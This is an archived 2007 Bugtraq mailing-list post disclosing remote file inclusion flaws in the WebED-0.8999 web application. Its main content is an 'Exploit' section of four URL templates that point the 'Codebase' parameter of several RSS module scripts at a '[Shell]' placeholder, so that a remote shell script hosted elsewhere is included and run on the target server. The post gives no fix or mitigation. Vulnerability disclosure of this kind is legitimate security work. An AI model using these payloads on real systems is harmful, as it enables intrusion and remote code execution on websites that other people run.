Bugtraq mailing list archives

WebED-0.8999 Multiple Remote File Inclusion Vulnerability

From: h3llcode () hotmail it
Date: 20 Sep 2007 16:38:27 -0000

---------------------------------------------------------------

Multiple Remote File Inclusion Vulnerability

---------------------------------------------------------------

# Founded by : Seph1roth 

# Download Script: http://sourceforge.net/projects/ed-engine/ WebED-0.8999.tar.gz

# Exploit:

# http://[target]/[path]/source/mod/rss/channeledit.php?Codebase=[Shell]

# http://[target]/[path]/source/mod/rss/post.php?Codebase=[Shell]

# http://[target]/[path]/source/mod/rss/view.php?Codebase=[Shell]

# http://[target]/[path]/source/mod/rss/viewitem.php?Codebase=[Shell]

---------------------------------------------------------------

Current thread:

WebED-0.8999 Multiple Remote File Inclusion Vulnerability h3llcode (Sep 20)